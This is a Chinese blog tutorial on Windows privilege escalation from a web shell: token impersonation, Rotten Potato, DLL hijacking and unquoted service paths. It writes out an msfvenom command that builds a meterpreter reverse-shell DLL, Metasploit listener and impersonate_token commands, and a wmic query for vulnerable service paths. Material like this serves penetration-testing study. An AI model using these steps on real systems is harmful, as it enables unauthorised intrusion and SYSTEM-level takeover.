web权限提升-令牌窃取烂土豆dll劫持

news/2024/5/17 17:36:39/文章来源:https://blog.csdn.net/m0_61506558/article/details/127374225

目录

(一)Windows2008&7令牌窃取提升-本地

0x01 前置知识——令牌(TOKEN)

令牌有很多种:

MSF伪造令牌实战

0x02 原理和利用范围

(二)烂土豆提权

1. 原理:

总结

2.环境搭建

(三)win2012-DLL劫持提权应用配合MSF-web权限

1.前置知识

2.漏洞原理

3.复现

 总结

(四)不带引号服务路径配合MSF-web


(一)Windows2008&7令牌窃取提升-本地


0x01 前置知识——令牌(TOKEN)


令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。

令牌有很多种:

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

MSF伪造令牌实战

假设我们现在已经获得了目标主机的权限,但是通过 getsystem 和其他方式提权失败。

此时,我们可以尝试使用假冒令牌进行提权。

use incognito           #进入incognito模块
list_tokens -u          #列出令牌

如图,可以看到有两种类型的令牌。

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。 

当前列出了3个令牌。我们就可以通过下面的命令假冒 Administrator 用户了。

0x02 原理和利用范围


原理:进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。

令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统。比如

  • Microsoft Windows XP Professional SP3和之前版本
  • Windows Server 2003 SP2和之前的版本
  • Windows Server 2003 x64和x64 SP2
  • Windows Server 2003 (用于基于Itanium的系统SP2和先前版本)
  • Windows Server 2008 x32 x64
  • Windows Server 2008 (用于基于Itanium的系统)
  • Windows Vista SP1和之前的版本
  • Windows Vista x64 SP1和之前的版本

61:权限提升-Redis&Postgre&令牌窃取&进程注入 - zhengna - 博客园

比较老,这里不再介绍。

(二)烂土豆提权


Microsoft 安全公告 MS16-075 - 重要 | Microsoft Learn

        首先要了解的是,烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户。

1. 原理:


  1. 欺骗NT AUTHORITY\SYSTEM账户通过NTLM认证到我们控制的TCP终端。
  2. 对这个认证过程使用中间人攻击(NTLM重放),为NT AUTHORITY\SYSTEM账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
  3. 模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。

所以,一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,我发现使用已经建好的账户(就是上面说的用户级账户)去反弹meterpreter然后再去执行EXP的时候会失败,但使用菜刀(IIS服务器权限)反弹meterpreter就会成功。即非服务类用户权限无法窃取成功

总结

通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。

2.环境搭建


  • GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
  • windows-kernel-exploits-master.zip

(三)win2012-DLL劫持提权应用配合MSF-web权限


1.前置知识

DLL攻击漫谈

2.漏洞原理

Windows程序启动的时候需要DLL。如果这些DLL不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索

  1. 应用程序加载的目录
  2. C:\Windows\System32
  3. C:\Windows\System
  4. C:\Windows
  5. 当前工作目录Current Working Directory,CWD
  6. 在PATH环境变量的目录(先系统后用户)

3.复现

通过信息收集,发现目标服务器上存在一个第三方软件flashfxp

 本地下载一个相同的软件,使用火绒剑工具进行进程调试分析。由于系统文件和系统目录里的文件我们无法删除修改,因此我们可以重点查看在软件安装目录里的未知文件和数字签名文件。可以选择ssleay32.dll文件进行后续的删除替换

 msf生成后门木马test.dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP Address> lport=<Your Port to Connect On> -f dll >/opt/test.dll

test.dll上传到目标服务器,修改名字并替换原来的ssleay32.dll

 msf启动监听,服务器运行flashfxp软件程序,成功监听到会话

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6677
exploit

配合令牌窃取,成功提权

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

 总结

  • dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋
  • AlwaysInstallElevated提权默认禁用配置,利用成功机会很少

(四)不带引号服务路径配合MSF-web


当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行(如图1)。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

  • 可执行文件的路径被包含在引号中

图一

比如,有一个服务a.exe,他的可执行文件的路径是"C:\Program Files\a.exe",路径被包含在引号中,则系统会正常解释并执行它,但是如果可执行文件的路径是C:\Program Files\a.exe,未被包含在引号中,则操作系统会执行空格之前的C:\Program,而将空格之后的Files\a.exe当做参数,导致出错,如下图所示

执行命令,检测未被引号包含且还有空格的服务路径

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

 使用msf制作一个后门,命名为Program.exe,上传到目标服务器C盘根目录

启动服务。可以在webshell中或者本地启动服务。但是测试时,webshell中启动不了,所以不带引号服务路径提权方法还是多用于本地提权

sc start "服务名"

 msf监听到会话,提权成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_404154.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Cosmos模块化功能链 走向亿级用户的超级Dapp时代

前言 加密不缺故事&#xff0c;而 Aptos 贡献了一次事故。 Move 生态的威力不应被轻视&#xff0c;跟随 Aptos 主网上线的&#xff0c;已经有域名服务 Aptos Names、钱包 Pontem、多签钱包 Momentum Safe、NFT 市场 Souffl3、借贷协议 Argo。 这是第一次众多应用和主网一起上…

【预测模型-DELM分类】基于哈里斯鹰算法改进深度学习极限学习机实现数据分类附matlab代码

✅作者简介&#xff1a;热爱科研的Matlab仿真开发者&#xff0c;修心和技术同步精进&#xff0c;matlab项目合作可私信。 &#x1f34e;个人主页&#xff1a;Matlab科研工作室 &#x1f34a;个人信条&#xff1a;格物致知。 更多Matlab仿真内容点击&#x1f447; 智能优化算法 …

Kubernetes—k8s介绍

文章目录k8s是什么kubernetes的主要概念PodReplicaSetDeploymentLabelServiceKubernetes 架构及组件Kubernetes架构kubernetes组件k8s是什么 官方介绍&#xff1a; Kubernetes 也称为 K8s&#xff08;中间8个字母&#xff0c;省略好记&#xff09;&#xff0c;是用于自动部署、…

垂钓图解教程: 鱼钩 All In One

垂钓图解教程: 鱼钩 All In One 鱼钩分类 鱼钩选择 线组搭配垂钓图解教程: 鱼钩 All In One 鱼钩分类有倒刺,无倒刺伊势尼 伊豆 新关东型号1, 2, 3, 4, 5, 6, 7, 8, 9 ...鱼钩选择依据目标鱼的类型 淡水鱼,海水鱼 底层鱼,中层鱼,上层鱼 食草性鱼,杂食性鱼,食肉性鱼目标鱼…

选择和循环结构的机器级表示

if-else两种机器级表示 注意区分条件转移和无条件转移指令 switch-case机器级表示 此处机器级代码是先判断了a>17和a<10时的default情况&#xff0c;然后10到17引用了跳转表&#xff0c;跳转表在目标文件的只读节中&#xff0c;按4字节边界对齐 但对于范围较大的swith-…

Spring Cloud Sleuth系列(1) — Sleuth环境搭建以及Feign整合调用分析

文章目录前言一、基础环境搭建1、项目环境搭建2、zipkin server启动3、基于Feign进行服务调用二、Sleuth Feign调用源码分析1、调用链分析2、Sleuth针对Feign进行的改造总结前言 该篇文章&#xff0c;主要介绍Spring Cloud Sleuth Zipkin基础环境搭建&#xff0c;以及基于源…

文华财经多个非常实用的期货指标公式,文华财经支撑压力自动画线公式

期货指标公式是通过数学逻辑角度计算而来&#xff0c;仅是期货分析环节中的一个辅助工具。期货市场具有不确定性和不可预测性的&#xff0c;请正常对待和使用指标公式! 期货指标公式信号本身就有滞后性&#xff0c;周期越大&#xff0c;滞后性越久。指标公式不是100%稳赚的工具…

畅享云原生超融合技术成果

作者&#xff1a;Vishal Ghariwala&#xff0c;SUSE 亚太及大中华区 CTO 超融合是服务器虚拟化和 VSAN 存储的必然发展结果。通过将存储、计算和网络这三大要素相集成&#xff0c;理论上数据中心对基础设施的控制能力可以无限扩展。这与超大规模运营商的发展目标高度契合&#…

电影主题HTM5网页设计作业成品——爱影评在线电影(10页面)使用dreamweaver制作采用DIV+CSS进行布局

HTML实例网页代码, 本实例适合于初学HTML的同学。该实例里面有设置了css的样式设置&#xff0c;有div的样式格局&#xff0c;这个实例比较全面&#xff0c;有助于同学的学习,本文将介绍如何通过从头开始设计个人网站并将其转换为代码的过程来实践设计。 文章目录一、网页介绍一…

【AGC035E】Develop(图论,DP)

对于某个集合 S⊆{1,⋯,n}S\subseteq\{1,\cdots,n\}S⊆{1,⋯,n}&#xff0c;考虑能不能删去 SSS。 对于任意 x∈Sx\in Sx∈S&#xff0c;连边 x→x−2x\to x-2x→x−2&#xff08;如果 x−2∈Sx-2\in Sx−2∈S&#xff09;及 x→xkx\to xkx→xk&#xff08;如果 xk∈Sxk\in Sx…

Ajax的概念及jQuery中的Ajax的3种方法,模仿jQuery封装自己的Ajax函数

目录一、网页中如何请求数据资源的请求方式二、Ajax1、什么是Ajax2、Ajax的特点3、Ajax工作原理4、同步与异步的区别三、jQuery中的Ajax1、$.get()函数2、$.post()函数3、$.ajax()函数四、模仿jQuery封装自己的Ajax函数实现效果1、定义options参数选项2、定义resoveData()函数处…

Clustering and Projected Clustering with Adaptive Neighbors

摘要 在本文中&#xff0c;提出了一种新的聚类模型来同时学习数据相似矩阵和聚类结构。新模型通过基于局部距离为每个数据点分配自适应和最优邻居来学习数据相似性矩阵。同时&#xff0c;对数据相似性矩阵的拉普拉斯矩阵施加新的秩约束&#xff0c;使得得到的相似性矩阵中的连…

特殊的线性规划:目标函数中的变量数目少于约束中的变量数目

如下&#xff0c;目标函数为min(x1)&#xff0c;该函数中只存在一个变量x1&#xff0c;但是约束中存在x2变量&#xff0c;线性规划还能求解吗&#xff1f;如下&#xff0c;目标函数为min (x_1)&#xff0c;该函数中只存在一个变量x_1&#xff0c;但是约束中存在x_2变量&#xf…

ES Elasticsearch

ES 本章知识点 三 ES简介 3.1 数据分类 我们生活中的数据总体分为三种&#xff1a;结构化数据&#xff0c;非结构化数据&#xff0c;半结构化数据结构化数据&#xff1a;指具有固定格式或有限长度的数据&#xff0c;如数据库&#xff0c;元数据等。 非结构化数据&#xff1…

【百日刷题计划 第十一天】——熟悉函数,递归及递推 函数,递归及递推基础题

文章目录&#x1f4a5;前言&#x1f609;解题报告&#x1f4a5;[NOIP2001 普及组] 数的计算&#x1f914;一、思路:&#x1f60e;二、源码&#xff1a;&#x1f62e;三、代码分析&#xff1a;&#x1f917; 鸡汤来咯&#xff1a;&#x1f4a5;前言 ☀️大家好☀️&#xff0c;我…

2018年美亚杯电子数据取证大赛-团体赛

&#x1f60b;大家好&#xff0c;我是YAy_17&#xff0c;是一枚爱好网安的小白&#xff0c;正在自学ing。 本人水平有限&#xff0c;欢迎各位大佬指点&#xff0c;一起学习&#x1f497;&#xff0c;一起进步⭐️。 ⭐️此后如竟没有炬火&#xff0c;我便是唯一的光。⭐️ 目…

RISC-V学习基础(五)

RISC-V汇编语言 C程序翻译成为可以在计算机上执行的机器语言程序的四个经典步骤。 函数调用规范&#xff08;Calling convention&#xff09; 函数调用过程通常分为6个阶段&#xff1a; 将参数存储到函数能够访问的位置。跳转到函数开始位置&#xff08;使用RV32I的jal指令…

考研图论算法

图论——txf 倘若考研需要像写算法题目那样&#xff0c;写出图论的代码&#xff0c;那无疑图论是最难级别的。 -----Williams Tian 1. 重点表述 ①线形表可以空表&#xff0c;树可以空树&#xff0c;但是图不能一个顶点也没有&#xff08;允许一条边也没有&#xff09;. ②…

ETC-4 week 3th

ETC-4 week 3th 出奇至胜 read They are only charged for the amount of power they consume on rainy days.They needn’t pay a single cent for their power consumption(消耗能量) on sunny days.(13 june) consume v 消耗 耗尽 吃光 喝光 沉溺 浪费LOL consumes(消耗…

安装docker,打包jar包镜像文件,输出tar压缩包

打包 jar 步骤在文章最后&#xff0c;不需要安装的请直接跳到文末查看 一键安装命令&#xff1a; curl -sSL https://get.daocloud.io/docker | sh设置开机自启并启动docker systemctl enable docker.service启动docker systemctl start docker查看docker状态 systemctl s…